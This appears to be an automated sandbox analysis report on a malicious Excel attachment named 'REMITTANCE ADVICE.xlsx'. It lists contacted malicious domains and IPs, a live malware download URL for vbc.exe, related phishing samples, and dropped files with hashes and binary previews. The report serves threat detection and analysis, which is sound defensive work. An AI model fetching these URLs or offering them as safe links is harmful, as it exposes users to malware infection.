          http://www.yhxt13800.com/m07f/?8pM=dna2QeGax28GSJkNz7Uka6j7mpWTPT6ewM6loPSgIzIWFgZfz42ON2JlykoAty+SKeMdPQ==&8p=5jRPexjhYVA | 0% | Avira URL Cloud | safe
          https://www.clicktoreach.com/m07f/?8p=5jRPexjhYVA&8pM=igd9ZaB/0LuNZ3khfd1rv5ythTuTDfiv5fbgroetehOkX6 | 0% | Avira URL Cloud | safe
          http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe
          http://www.promtgloan.com/m07f/?8p=5jRPexjhYVA&8pM=fckM7dU8XdB/CBRKAli8IWZTeVSsZcSnfT9NsehECm7QI2Avboj8F2o4ZiYCfg8g2yKAcw== | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          ff4cu6twc.xyz | 23.225.139.107 | true | true | | unknown
          www.yhxt13800.com | 154.205.233.189 | true | true | | unknown
          promtgloan.com | 34.102.136.180 | true | false | | unknown
          www.clicktoreach.com | 156.234.44.48 | true | true | | unknown
          www.promtgloan.com | unknown | unknown | true | | unknown
          www.ff4cu6twc.xyz | unknown | unknown | true | | unknown

          Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          http://192.210.173.90/70007/vbc.exe | true | Avira URL Cloud: malware | unknown
          www.ff4cu6twc.xyz/m07f/ | true | Avira URL Cloud: phishing | low
          http://www.clicktoreach.com/m07f/?8p=5jRPexjhYVA&8pM=igd9ZaB/0LuNZ3khfd1rv5ythTuTDfiv5fbgroetehOkX6jie/kGfA2Y9msKDFCRQxq0nA== | true | Avira URL Cloud: safe | unknown
          http://www.yhxt13800.com/m07f/?8pM=dna2QeGax28GSJkNz7Uka6j7mpWTPT6ewM6loPSgIzIWFgZfz42ON2JlykoAty+SKeMdPQ==&8p=5jRPexjhYVA | true | Avira URL Cloud: safe | unknown
          http://www.promtgloan.com/m07f/?8p=5jRPexjhYVA&8pM=fckM7dU8XdB/CBRKAli8IWZTeVSsZcSnfT9NsehECm7QI2Avboj8F2o4ZiYCfg8g2yKAcw== | false | Avira URL Cloud: safe | unknown

          URLs from Memory and Binaries

          Name | Source | Malicious | Antivirus Detection | Reputation
          http://www.windows.com/pctv. | explorer.exe, 00000006.00000000.470431447.0000000002AE0000.00000002.00020000.sdmp | false | | high
          http://investor.msn.com | vbc.exe, 00000004.00000002.466454862.0000000002C60000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.470431447.0000000002AE0000.00000002.00020000.sdmp | false | | high
          http://www.msnbc.com/news/ticker.txt | vbc.exe, 00000004.00000002.466454862.0000000002C60000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.470431447.0000000002AE0000.00000002.00020000.sdmp | false | | high
          http://wellformedweb.org/CommentAPI/ | explorer.exe, 00000006.00000000.512027103.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
          http://www.iis.fhg.de/audioPA | explorer.exe, 00000006.00000000.512027103.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
          http://nsis.sf.net/NSIS_ErrorError | vbc.exe, 00000004.00000002.464908482.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000004.00000000.456767218.0000000000409000.00000008.00020000.sdmp, vbc.exe, 00000005.00000000.461220666.0000000000409000.00000008.00020000.sdmp | false | | high
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true | vbc.exe, 00000004.00000002.466643244.0000000002E47000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.489358652.0000000002CC7000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
          http://www.hotmail.com/oe | vbc.exe, 00000004.00000002.466454862.0000000002C60000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.470431447.0000000002AE0000.00000002.00020000.sdmp | false | | high
          http://treyresearch.net | explorer.exe, 00000006.00000000.512027103.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
          http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | vbc.exe, 00000004.00000002.466643244.0000000002E47000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.489358652.0000000002CC7000.00000002.00020000.sdmp | false | | high
          http://java.sun.com | explorer.exe, 00000006.00000000.487883890.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.467436694.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.480003695.0000000000255000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
          http://www.icra.org/vocabulary/. | vbc.exe, 00000004.00000002.466643244.0000000002E47000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.489358652.0000000002CC7000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | vbc.exe, 00000004.00000002.465747026.00000000022C0000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.480237988.0000000001BE0000.00000002.00020000.sdmp | false | | high
          http://nsis.sf.net/NSIS_Error | vbc.exe, vbc.exe, 00000004.00000002.464908482.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000004.00000000.456767218.0000000000409000.00000008.00020000.sdmp, vbc.exe, 00000005.00000000.461220666.0000000000409000.00000008.00020000.sdmp | false | | high
          http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | explorer.exe, 00000006.00000000.510856156.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.472698287.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.493785914.0000000008417000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.483993743.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.486816221.00000000083D7000.00000004.00000001.sdmp | false | | high
          http://investor.msn.com/ | vbc.exe, 00000004.00000002.466454862.0000000002C60000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.470431447.0000000002AE0000.00000002.00020000.sdmp | false | | high
                                          http://www.piriform.com/ccleanerexplorer.exe, 00000006.00000000.510856156.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.484145859.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.472911483.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.472698287.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.493785914.0000000008417000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.483993743.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.486816221.00000000083D7000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.510967068.0000000004513000.00000004.00000001.sdmpfalse
                                            high
                                            http://computername/printers/printername/.printerexplorer.exe, 00000006.00000000.512027103.0000000004650000.00000002.00020000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            low
                                            http://www.%s.comPAvbc.exe, 00000004.00000002.465747026.00000000022C0000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.480237988.0000000001BE0000.00000002.00020000.sdmpfalse
                                            • URL Reputation: safe
                                            low
                                            http://www.autoitscript.com/autoit3explorer.exe, 00000006.00000000.487883890.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.467436694.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.480003695.0000000000255000.00000004.00000020.sdmpfalse
                                              high
                                              https://support.mozilla.orgexplorer.exe, 00000006.00000000.487883890.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.467436694.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.480003695.0000000000255000.00000004.00000020.sdmpfalse
                                                high
                                                https://www.clicktoreach.com/m07f/?8p=5jRPexjhYVA&8pM=igd9ZaB/0LuNZ3khfd1rv5ythTuTDfiv5fbgroetehOkX6explorer.exe, 00000007.00000002.671238367.0000000002E22000.00000004.00020000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://servername/isapibackend.dllexplorer.exe, 00000006.00000000.490467352.0000000003E50000.00000002.00020000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                low

                                                Contacted IPs

                                                Public

IP | Domain | Country | ASN | ASN Name | Malicious
192.210.173.90 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
154.205.233.189 | www.yhxt13800.com | Seychelles | 26484 | IKGUL-26484US | true
156.234.44.48 | www.clicktoreach.com | Seychelles | 136800 | XIAOZHIYUN1-AS-APICIDCNETWORKUS | true
23.225.139.107 | ff4cu6twc.xyz | United States | 40065 | CNSERVERSUS | true
34.102.136.180 | promtgloan.com | United States | 15169 | GOOGLEUS | false

                                                General Information

                                                Joe Sandbox Version:34.0.0 Boulder Opal
                                                Analysis ID:528736
                                                Start date:25.11.2021
                                                Start time:18:11:00
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 9m 55s
                                                Hypervisor based Inspection enabled:false
                                                Report type:light
                                                Sample file name:REMITTANCE ADVICE.xlsx
                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:12
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:1
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal100.troj.expl.evad.winXLSX@9/24@4/5
                                                EGA Information:Failed
                                                HDC Information:
                                                • Successful, ratio: 35.9% (good quality ratio 34.3%)
                                                • Quality average: 73%
                                                • Quality standard deviation: 28.6%
                                                HCA Information:
                                                • Successful, ratio: 92%
                                                • Number of executed functions: 0
                                                • Number of non-executed functions: 0
                                                Cookbook Comments:
                                                • Adjust boot time
                                                • Enable AMSI
                                                • Found application associated with file extension: .xlsx
                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                • Attach to Office via COM
                                                • Scroll down
                                                • Close Viewer
                                                Warnings:
                                                • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                • TCP Packets have been reduced to 100
• Not all processes were analyzed; the report is missing behavior information

                                                Simulations

                                                Behavior and APIs

Time | Type | Description
18:11:39 | API Interceptor | 63x Sleep call for process: EQNEDT32.EXE modified
18:11:46 | API Interceptor | 75x Sleep call for process: vbc.exe modified
18:12:15 | API Interceptor | 225x Sleep call for process: explorer.exe modified

                                                Joe Sandbox View / Context

                                                IPs

Per match: Associated Sample Name / URL | Detection | Context

Match: 192.210.173.90
• REMITTANCE ADVICE.xlsx | malicious | 192.210.173.90/9996/vbc.exe

Match: 23.225.139.107
• Citation-HEQ211025001T-EXPP v4,pdf.exe | malicious | www.ff4c2myy0.xyz/b62n/?0N645BeP=2z8/DFBh6WpSpFX6wB1064sDrPXSeSOfJoiQLvsLuWsNGL1vZNLvTgutkyJJNZ2OPBS2&vVSdF=CPGHuRZ
• nieuwe voorbeeldcatalogus.exe | malicious | www.ff4cdhffx.xyz/wtcv/?fDKDRP=4hl0tBDHW6JPsXG0&nfB=FSi4Qdy434FsvWx/pZkyb0EEcskqbIDHoUhsco76HWNDqdZM/2zbMwwINEqH4o0RX6tYdNliSQ==
• ITRli68rgq.exe | malicious | www.ff4ciib4q.xyz/bs8f/?of=9rSLDPtHxj9hfT&3fKPRDU=l/4T0KvG3Qbse26kA+T24bIAmCiYaIE9w6t3mmhaX7GL32gDljPc3Nx0v53cYcljly9R
• NUo71b3C4p.exe | malicious | www.ff4cuno43.xyz/fqiq/?08CT3r=I63H3q6o+dl8AtpK+GpoKwAA/R2rUg5XwX/Qi823haVwXJBXcEYht0Yyg/fQMhe0Sr5t&fB8P=4hMPVF78e
• rundll32.exe | malicious | www.ff4cuno43.xyz/fqiq/?G48P-=I63H3q6o+dl8AtpK+GpoKwAA/R2rUg5XwX/Qi823haVwXJBXcEYht0Yyg8z5PhiMbIM7MatDHw==&hR=2dsLLTLhqbjx
• fdnVx1v1hc.exe | malicious | www.ff4cuno43.xyz/fqiq/?r8k4qP=I63H3q6o+dl8AtpK+GpoKwAA/R2rUg5XwX/Qi823haVwXJBXcEYht0Yyg8zAQQCPVeQ8MatEUA==&eFN=NfkTrPI0M
• Draft shipping docs CI+PL_pdf.exe | malicious | www.ff4ciib4q.xyz/bs8f/?oZR0KfS=l/4T0KvG3Qbse26kA+T24bIAmCiYaIE9w6t3mmhaX7GL32gDljPc3Nx0v6XMX91b7XUW&4heD=t0DpAxUX0Zi
• file0_stage3.dll | malicious | www.ff4c75x4e.xyz/n8rn/?p2M=CBFdZGnnfRINNaHscVQzF6AW/CZxn+KqjlWBM+9MoyK/4TfCk94Vamz7l1wogD2uBQw9&klfLI=1bpx2rFhipSD4d
• sLtLgOtoPA.exe | malicious | www.ff4cuno43.xyz/fqiq/?Pbu=IbAhXpax&i48l=I63H3q6o+dl8AtpK+GpoKwAA/R2rUg5XwX/Qi823haVwXJBXcEYht0Yyg8/ADAOMMOQq
• Cs3PcPy48f.msi | malicious | www.ff4ca2623.xyz/fs3g/?Nr=Ya9NpMQyWUJcX8KgUZas68LXNBlV9zz2Bv5wz28/jqX+xqkVWAhUyruGfYE1L5Gi4K/f&8p_h4N=o2Mtah
• SUPPLY_PRICE_ORDER_9978484DF.exe | malicious | www.ff4c3dgsp.xyz/rgoe/?n0DhB=j0DpGx9XxT-Tnhk&0N9=sgGY6EHrU2/sPlFv65T/Wb7gB3GGagfeDoLJsp77UP3iiMN1AZE/7XMT6P9bXkgBT15arvy1nw==
• Payment_Breakdown_pdf.exe | malicious | www.xlff08161z6b239.xyz/ons5/?3f-=dV1HNRUKQAWmuWwulpLGpeH60htmSo5o/mC4LpNZY1M8X1pV+bTt0ziROeFd8wC1X41C&YR-0=y48tk6C

                                                Domains

Match | Associated Sample Name / URL | Detection | Context (no rows)

                                                ASN

Per match: Associated Sample Name / URL | Detection | Context

Match: IKGUL-26484US
• Zr26f1rL6r.exe | malicious | 164.155.212.139
• bWDUmvmiU2.exe | malicious | 164.155.184.27
• oBQ6KSv5X5.exe | malicious | 164.155.184.27
• Hpeiw33wDB | malicious | 156.249.231.178
• AWB_SHIPPING DOCS.exe | malicious | 164.155.212.139
• he7hRoAnnx | malicious | 156.249.231.175
• UMzkP6ANWU | malicious | 156.249.231.108
• i4AQJGJ40T | malicious | 154.205.138.16
• guvcIjZ3sy | malicious | 156.238.135.198
• Llh4ns8qWz | malicious | 156.249.231.150
• x86 | malicious | 156.249.231.173
• d8Hs7X8HGP | malicious | 156.231.211.181
• x86 | malicious | 156.231.181.95
• Heri2RE17I | malicious | 156.249.231.116
• mktkJhN1Fd | malicious | 156.249.231.186
• SQFoFeC1jQ | malicious | 156.238.135.174
• pZvr71PT9v | malicious | 156.251.66.56
• WcBBoVjwRf | malicious | 156.249.231.160
• NUo71b3C4p.exe | malicious | 164.155.184.27
• SouaKX7fQj | malicious | 156.247.139.123

Match: AS-COLOCROSSINGUS
• 3nkW4MtwSD.rtf | malicious | 198.46.199.153
• Employee payment plan.HTM | malicious | 23.95.214.111
• ATT67586.HTM | malicious | 172.245.112.92
• xF3wienie.xlsx | malicious | 198.23.207.111
• Quote Request - Linde Tunisia.xlsx | malicious | 107.173.191.111
• PO PENANG ORDER C0023.xlsx | malicious | 198.12.107.117
• BANK-SWIFT.xlsx | malicious | 107.173.229.133
• 1HT42224.xlsx | malicious | 198.23.207.36
• new order.xlsx | malicious | 198.23.251.13
• Shipping Schedule.xlsx | malicious | 198.12.91.205
• Product_Specification_Sheet.xlsx | malicious | 107.173.219.26
• lod2.xlsx | malicious | 198.23.207.36
• Payment Slip.xlsx | malicious | 198.46.136.245
• 20002.xlsx | malicious | 198.46.136.245
• lSBl5Mhq80.rtf | malicious | 198.46.199.153
• STATEMENT OF ACCOUNT.xlsx | malicious | 192.227.228.37
• new order.docx | malicious | 198.46.199.153
• Amended Order.xlsx | malicious | 192.3.121.173
• Payment Swift.xlsx | malicious | 198.12.107.104
• SOA.xlsx | malicious | 107.172.13.149

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

Per match: Associated Sample Name / URL | Detection | Context

Match: C:\Users\user\AppData\Local\Temp\nsvE542.tmp\otav.dll
• vbc.exe | malicious | (no context)

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                  Category:downloaded
                                                  Size (bytes):305085
                                                  Entropy (8bit):7.93321683103638
                                                  Encrypted:false
                                                  SSDEEP:6144:rGiIouWvjqebPleWFVGwN5QwB0ZmAFd+DnMAlym7a:fzuebPlDVGwNh3AFPb
                                                  MD5:1624595E2354FF7BE9E7DC6DEF2ED69E
                                                  SHA1:1DCFAAE594E3690D3FEF5FD4DE855D02E9CBB2A5
                                                  SHA-256:4B50745E74FEA6FAA516B4D46B7C9FBE36FDAE2301B76EC940635D033707A2C8
                                                  SHA-512:AEBD6E6D28ECAB56E48B037836C2FFC573A8493B576EA3B59AC6932C6E782FC99AD1DA7A67A231830A2C4612C89E24F0E7F483D24080F29D6133D81C7207971E
                                                  Malicious:true
                                                  Antivirus:
• Antivirus: Metadefender, Detection: 9%
                                                  • Antivirus: ReversingLabs, Detection: 27%
                                                  Reputation:low
                                                  IE Cache URL:http://192.210.173.90/70007/vbc.exe
                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................\...........0.......p....@..........................................................................t.......p...............................................................................p...............................text...h[.......\.................. ..`.rdata.......p.......`..............@..@.data...X\...........t..............@....ndata...................................rsrc........p.......x..............@..@........................................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\16F16FDC.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):19408
                                                  Entropy (8bit):7.931403681362504
                                                  Encrypted:false
                                                  SSDEEP:384:6L3Vdo4yxL8FNgQ9jYtUO5Zn4tIlQ1Yes7D6PhbXngFfZdQTEfn4n6EVPBo6a:2exL8rgQ2tVF4GlQUuZXnYfTs6EJiL
                                                  MD5:63ED10C9DF764CF12C64E6A9A2353D7D
                                                  SHA1:608BE0D9462016EA4F05509704CE85F3DDC50E63
                                                  SHA-256:4DAC3676FAA787C28DFA72B80FE542BF7BE86AAD31243F63E78386BC5F0746B3
                                                  SHA-512:9C633C57445D67504E5C6FE4EA0CD84FFCFECFF19698590CA1C4467944CD69B7E7040551A0328F33175A1C698763A47757FD625DA7EF01A98CF6C585D439B4A7
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  Preview: .PNG........IHDR.............L.!... .IDATx..g.].y&X'...{;.t@F. .. .D*Q.eI..#[.5~lK3...z.3.gw...^.=;.FV..%..d..%R..E......F.ts<..X..f..F..5|..s..:Uu.W.U....!.9...A..u/...g.w......lx...pG..2..x..w..!...w.pG..2..x..w..!.....m.a>.....R........x.IU[.A.....].Y.L..!....|AQ.h4....x..\6....|.i..]..Q..(...C..A..Z... (j.f4..u=..o.D.oj....y6......)I.......G.{zn.M,...?#..,...|....y....G.LOO..?.....7..-.>.._.m[.........q.O}..G....?....h4.=t..c...eY.........3g..|0...x...|..../F....o.._|...?.O..........c..x._..7vF..0.....B>.....}{..V....P(.....c.....4...s...K.K."c(.....}.0......._z...}..y<<.......<..^.7....k.r.W~..c._.....$J....:.w._~.........._..Wp.....q........G..vA.D.E......"...?...'....}nvv....^.^.42..f....Q(..$...`(vidd..8......y.Z{...L.~...k....z....@@0...Bk..?.r..7...9u...w.>w.C..j.n..a..V.?..?...es#.G...l.&I..)..).J..>...+Mn.^.W.._....D...".}..k......8.N_.v..>.y.@0..,/.........>.a...........z.].../.r .........../3.....?.z..g.Z.....l0.L.S....._../.r
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1B2337C9.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):68702
                                                  Entropy (8bit):7.960564589117156
                                                  Encrypted:false
                                                  SSDEEP:1536:Hu2p9Cy+445sz12HnOFIr0Z7gK8mhVgSKe/6mLsw:O2p9w1HCIOTKEhQw
                                                  MD5:9B8C6AB5CD2CC1A2622CC4BB10D745C0
                                                  SHA1:E3C68E3F16AE0A3544720238440EDCE12DFC900E
                                                  SHA-256:AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
                                                  SHA-512:407F29E5F0C2F993051E4B0C81BF76899C2708A97B6DF4E84246D6A2034B6AFE40B696853742B7E38B7BBE7815FCCCC396A3764EE8B1E6CFB2F2EF399E8FC715
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  Preview: .PNG........IHDR.....................pHYs..........+......tIME......&...T....tEXtAuthor....H....tEXtDescription...!#....tEXtCopyright....:....tEXtCreation time.5.......tEXtSoftware.]p.:....tEXtDisclaimer.........tEXtWarning........tEXtSource.........tEXtComment........tEXtTitle....'.. .IDATx...y|T.?..l..3. .$.D..(v....Q.q.....W.[...Z..-.*Hlmm...4V..BU..V@,h.t.....}...cr.3.......B3s.....|.}.G6j.t.Qv..-Q9...r\"""""""".H9...Y..*.v...........7........Q..^t{P..C..""""""""".e..n@7B.{Q.S.HDDDDDDDD...........\bxHDDDDDDDDD.1<$""""""""......d2Y@9`@c.v..8P...0`..a|.....<... ..+...[""""""""".....~..,........+.t..._..o.....8z.$ ..U.Mp".....Z8.a;.B..'...y..I^......e........,}.+.M..K...M...A.7.Z[[.E.....B...nF.:5.."""""""".(.....d.3*..E.=...[o...o.....n..._.{..-..M.3....px(.5..4lt..&....d.R!.......!.$''.n.....X,..__ar.d..0 .M#"""""""..S...T...Ai.8P^XX(..d.....u[.f...8........[`...q..9R../.....v.b.5.r`.[.A..a.....a6......S.o.h7...........g..v..+.~.oB.H..|..8...
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\25CF4E4A.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 338 x 143, 8-bit/color RGBA, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):6364
                                                  Entropy (8bit):7.935202367366306
                                                  Encrypted:false
                                                  SSDEEP:192:joXTTTt+cmcZjbF/z2sA9edfxFHTeDELxExDR:joXTTTEc5ZjR/zI9EfjTeDEGxDR
                                                  MD5:A7E2241249BDCC0CE1FAAF9F4D5C32AF
                                                  SHA1:3125EA93A379A846B0D414B42975AADB72290EB4
                                                  SHA-256:EC022F14C178543347B5F2A31A0BFB8393C6F73C44F0C8B8D19042837D370794
                                                  SHA-512:A5A49B2379DF51DF5164315029A74EE41A2D06377AA77D24A24D6ADAFD3721D1B24E5BCCAC72277BF273950905FD27322DBB42FEDA401CA41DD522D0AA30413C
                                                  Malicious:false
                                                  Preview: .PNG........IHDR...R...........S.....sRGB.........gAMA......a.....pHYs..........o.d...!tEXtCreation Time.2018:08:27 10:23:35Z......DIDATx^....M......3c0f0.2.9o.......-..r..:.V*.ty..MEJ.^.$G.T.AJ.J.n.....0.`...B...g=....{..5.1...|.g.z..Y.._...3k..y............@JD...)..KQ.........f.DD.1.....@JD...)..K..DD.1.....@JD...)..K..DD.1.....@JD...)..K..DD.....9.sdKv.\.R[...k...E..3....ee.!..Wl...E&6.\.]..'K...x.O..%.EE..'...}..[c....?n..R...V..U5!.Rt...-xw*.....#..._....I....k.!":...H.....eKN.....9....{%......*7..6Y..".....P....."ybQ.....JJ`z..%..a.$<m.n'..[.f0~..r.........-.q...{.Mu3.yX...\...5.a.zNX.9..-.[......QU.r .qZ...&.{....$..`.Lu..]Z^'.].k|.z.3....H.../...k7.1>y.D..._x...........=.u.?ee.9.'.11:={.t]....)..k...F@P|f....9...K>...{...}...h9.b..h....w.....A~...u..j.9..x..C=.JJ.h....K2.... .../I..=3C.6k.]...JD.....:tP.e...-+*...}..\.Yrss4...i.f..A7I...u.M....v.uY_.V|.].-Oo..........._.;@c....`.....|.R7>^...j*S...{...w.iV..UR..SJ.hy.W3...2Q@f......,.....
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\29F275C3.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):10202
                                                  Entropy (8bit):7.870143202588524
                                                  Encrypted:false
                                                  SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                                                  MD5:66EF10508ED9AE9871D59F267FBE15AA
                                                  SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                                                  SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                                                  SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                                                  Malicious:false
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\34C7D190.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):10202
                                                  Entropy (8bit):7.870143202588524
                                                  Encrypted:false
                                                  SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                                                  MD5:66EF10508ED9AE9871D59F267FBE15AA
                                                  SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                                                  SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                                                  SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                                                  Malicious:false
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3C46ACE8.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 600 x 306, 8-bit colormap, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):42465
                                                  Entropy (8bit):7.979580180885764
                                                  Encrypted:false
                                                  SSDEEP:768:MUC94KctLo6+FkVfaapdydSo7CT3afPFUaV8v9TIzsrZsQ54kvd8gjDsss2Ur6:MJctLo63a8dydV+3WOa+90sZsSyMs+
                                                  MD5:C31D090D0B6B5BCA539D0E9DB0C57026
                                                  SHA1:D00CEE7AEE3C98505CDF6A17AF0CE28F2C829886
                                                  SHA-256:687AFECEE6E6E286714FD267E0F6AC74BCA9AC6469F4983C3EF7168C65182C8D
                                                  SHA-512:B23CA96097C2F5ED8CC251C0D6A34F643EE2251FDF3DEF6A962A168D82385CFEE2328D39FF86AADEA5EDBBF4D35882E6CD9CF8ECE43A82BD8F06383876B24756
                                                  Malicious:false
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4950562D.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):11303
                                                  Entropy (8bit):7.909402464702408
                                                  Encrypted:false
                                                  SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                                  MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                                  SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                                  SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                                  SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                                  Malicious:false
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6ED27E1E.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):68702
                                                  Entropy (8bit):7.960564589117156
                                                  Encrypted:false
                                                  SSDEEP:1536:Hu2p9Cy+445sz12HnOFIr0Z7gK8mhVgSKe/6mLsw:O2p9w1HCIOTKEhQw
                                                  MD5:9B8C6AB5CD2CC1A2622CC4BB10D745C0
                                                  SHA1:E3C68E3F16AE0A3544720238440EDCE12DFC900E
                                                  SHA-256:AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
